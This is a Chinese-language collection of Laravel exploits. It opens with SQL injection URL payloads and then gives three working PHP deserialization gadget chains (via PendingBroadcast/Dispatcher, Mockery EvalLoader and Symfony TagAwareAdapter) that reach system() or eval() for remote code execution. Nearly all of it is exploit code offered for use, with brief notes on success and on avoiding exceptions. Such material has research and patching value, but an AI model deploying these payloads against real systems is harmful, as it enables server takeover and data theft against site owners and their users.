Laravel 漏洞合集

 Laravel 漏洞合集

Laravel 存在SQL注入漏洞

poc:

/test?email=1&id=1 union select user()#

/test?email=1/`&id=1&column=/ union select user()--+-

可以看的注入成功

Laravel 反序列化漏洞

一.   poc:

<?php
namespace Illuminate\Broadcasting{

    use Illuminate\Bus\Dispatcher;
    use Illuminate\Foundation\Console\QueuedCommand;

    class PendingBroadcast
    {
        protected $events;
        protected $event;
        public function __construct(){
            $this->events=new Dispatcher();
            $this->event=new QueuedCommand();
        }
    }
}
namespace Illuminate\Foundation\Console{
    class QueuedCommand
    {
        public $connection="dir";
    }
}
namespace Illuminate\Bus{
    class Dispatcher
    {
        protected $queueResolver="system";

    }
}
namespace{

    use Illuminate\Broadcasting\PendingBroadcast;

    echo urlencode(serialize(new PendingBroadcast()));
}

 发现得到回显

二.    poc:

<?php
namespace Illuminate\Broadcasting{

    use Illuminate\Bus\Dispatcher;
    use Illuminate\Foundation\Console\QueuedCommand;

    class PendingBroadcast
    {
        protected $events;
        protected $event;
        public function __construct(){
            $this->events=new Dispatcher();
            $this->event=new QueuedCommand();
        }
    }
}
namespace Illuminate\Foundation\Console{

    use Mockery\Generator\MockDefinition;

    class QueuedCommand
    {
        public $connection;
        public function __construct(){
            $this->connection=new MockDefinition();
        }
    }
}
namespace Illuminate\Bus{

    use Mockery\Loader\EvalLoader;

    class Dispatcher
    {
        protected $queueResolver;
        public function __construct(){
            $this->queueResolver=[new EvalLoader(),'load'];
        }
    }
}
namespace Mockery\Loader{
    class EvalLoader
    {

    }
}
namespace Mockery\Generator{
    class MockDefinition
    {
        protected $config;
        protected $code;
        public function __construct()
        {
            $this->code="<?php phpinfo();exit()?>";
            $this->config=new MockConfiguration();
        }
    }
    class MockConfiguration
    {
        protected $name="feng";
    }
}

namespace{

    use Illuminate\Broadcasting\PendingBroadcast;

    echo urlencode(serialize(new PendingBroadcast()));
}

这个POC就更加舒服了，因为利用的是eval，可以任意执行代码，不仅仅局限于单参数的函数了。而且注意这个：$this->code="<?php phpinfo();exit()?>";
加上了exit()，提前结束了进程，这样调用完call_user_func，后面的代码就不会执行，也就不会抛出异常了，更加好了。
 

三.   poc:

<?php
namespace Symfony\Component\Cache\Adapter{

    use Symfony\Component\Cache\CacheItem;

    class TagAwareAdapter
    {
        private $deferred;
        public function __construct(){
            $this->pool=new ProxyAdapter();
            $this->deferred=array(
                'feng'=>new CacheItem()
            );
        }
    }
}
namespace Symfony\Component\Cache{
    final class CacheItem{
        protected $poolHash="1";
        protected $innerItem="dir";
    }
}
namespace Symfony\Component\Cache\Adapter{
    class ProxyAdapter
    {
        private $poolHash="1";
        private $setInnerItem="system";
    }
}
namespace{

    use Symfony\Component\Cache\Adapter\TagAwareAdapter;

    echo urlencode(serialize(new TagAwareAdapter()));
}

 执行成功